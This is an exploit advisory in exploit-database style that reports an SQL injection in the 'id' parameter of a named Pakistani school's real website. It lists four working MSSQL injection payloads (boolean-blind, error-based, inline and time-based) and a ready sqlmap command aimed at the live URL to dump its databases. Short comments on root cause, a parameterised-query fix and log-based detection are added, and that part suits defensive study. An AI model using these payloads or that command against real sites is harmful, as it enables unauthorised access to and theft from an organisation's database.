# Exploit Title : Nice Education System Peshawar SQL Injection
# Author : Ahmet Bozkurt
# Date : 23/09/2019
# Vendor Homepage : http://www.niceeducationsystem.edu.pk
# Tested On : Kali Linux
# Category : WebSite
# Exploit Risk : Medium
##############################################################################
# Exploit
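/index.php?id=[SQL Injection]
Parameter: id (GET)
# Root cause (inferred from the payloads): the boolean-based, error-based and time-based payloads below each close a parenthesis right after the numeric value and re-open one at the end, which suggests the id value is concatenated unquoted into a parenthesised WHERE condition.
# Fix: validate id as an integer and bind it as a query parameter instead of building the SQL string from the request; that removes all four injection types listed here.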
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6) AND 3391=3391 AND (4096=4096
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: id=6) AND 6970 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6970=6970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113))) AND (1245=1245
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6826=6826) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113))
Type: time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
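Payload: id=6) OR 4100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2695=2695
# Detection: the delay comes from a seven-way cross join of sysusers, so on the database side it should appear as an unusually long-running query against a system table issued by the web application's account. Because id is a GET parameter, the CHAR(..)+CHAR(..) concatenations and the sysusers references in these payloads would normally also be visible in the web server's access log.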
# SQLMap
python sqlmap.py -u ""http://www.niceeducationsystem.edu.pk/index.php?id=31" --dbs
##############################################################################
Special Thanks: Jeng4L - imhatimi